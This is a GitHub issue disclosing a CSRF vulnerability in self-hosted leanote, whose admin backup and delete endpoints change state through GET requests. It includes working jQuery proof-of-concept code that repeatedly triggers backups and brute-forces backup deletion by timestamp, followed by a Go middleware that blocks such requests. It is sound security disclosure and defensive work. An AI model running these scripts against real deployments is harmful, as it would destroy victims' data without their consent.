Use GET method to modify things which may cause CSRF attack. #692

Closed
cissoid opened this Issue Nov 24, 2017 · 0 comments


cissoid commented Nov 24, 2017

All these JavaScript functions could be executed on any website. That's all I need to do these attacks: 1) I know your custom domain (if you deploy leanote yourself); 2) you are logged in to your leanote website.

For example, let's try to auto backup once per second:

function backup() {
    $.ajax({
        url: "https://your.custom.domain/adminData/backup",
        crossDomain: true,
        xhrFields: {withCredentials: true}
    });
    setTimeout(backup, 1000);
}
backup();

Maybe the backup operation is "safe" because there's no data lost, but deleting backups is also feasible, because the only parameter needed is the timestamp, which is easy to crack using brute force.

// DON'T TRY!!! THIS MAY DELETE YOUR DATA!!!
var timestamp = parseInt(new Date().getTime() / 1000);
function tryDelete() {
    $.ajax({
        url: "https://your.custom.domain/adminData/delete?createdTime=" + timestamp,
        crossDomain: true,
        xhrFields: {withCredentials: true}
    });
    timestamp--;
    setTimeout(tryDelete, 1000);
}

There are some more interfaces which modify things by GET:
https://github.com/leanote/leanote/search?p=1&q=ajaxGet&type=Code&utf8=%E2%9C%93
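As an added defender-side example (not leanote's code and not part of the report): a Go net/http middleware that refuses the GET-driven state changes described above, requiring POST, a same-origin Origin/Referer header and a double-submit CSRF token before the handler runs. The host, the csrf cookie and X-CSRF-Token header names, and the two admin paths are assumptions made for illustration.

```go
package main

import (
	"crypto/subtle"
	"net/http"
	"net/url"
)

// Deployment host and the state-changing paths named in the report (assumed).
const siteHost = "your.custom.domain"

var stateChanging = map[string]bool{"/adminData/backup": true, "/adminData/delete": true}

// sameOrigin: the browser sets Origin (or Referer) and a page on another
// site cannot overwrite it, so a request fired cross-site fails here even
// though the browser attached the victim's session cookie.
func sameOrigin(r *http.Request) bool {
	src := r.Header.Get("Origin")
	if src == "" {
		src = r.Header.Get("Referer")
	}
	u, err := url.Parse(src)
	return src != "" && err == nil && u.Host == siteHost
}

// CSRFGuard: state-changing paths must be POST, same-origin, and carry an
// X-CSRF-Token header equal to the csrf cookie (double-submit token).
func CSRFGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if stateChanging[r.URL.Path] {
			if r.Method != http.MethodPost {
				http.Error(w, "state change requires POST", http.StatusMethodNotAllowed)
				return
			}
			c, err := r.Cookie("csrf")
			tok := r.Header.Get("X-CSRF-Token")
			if !sameOrigin(r) || err != nil || tok == "" ||
				subtle.ConstantTimeCompare([]byte(c.Value), []byte(tok)) != 1 {
				http.Error(w, "cross-site request rejected", http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}
```

Wrap the router with CSRFGuard; the backup and delete handlers then only see requests the guard has already tied to the site's own pages.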

@cissoid cissoid closed this Apr 17, 2018
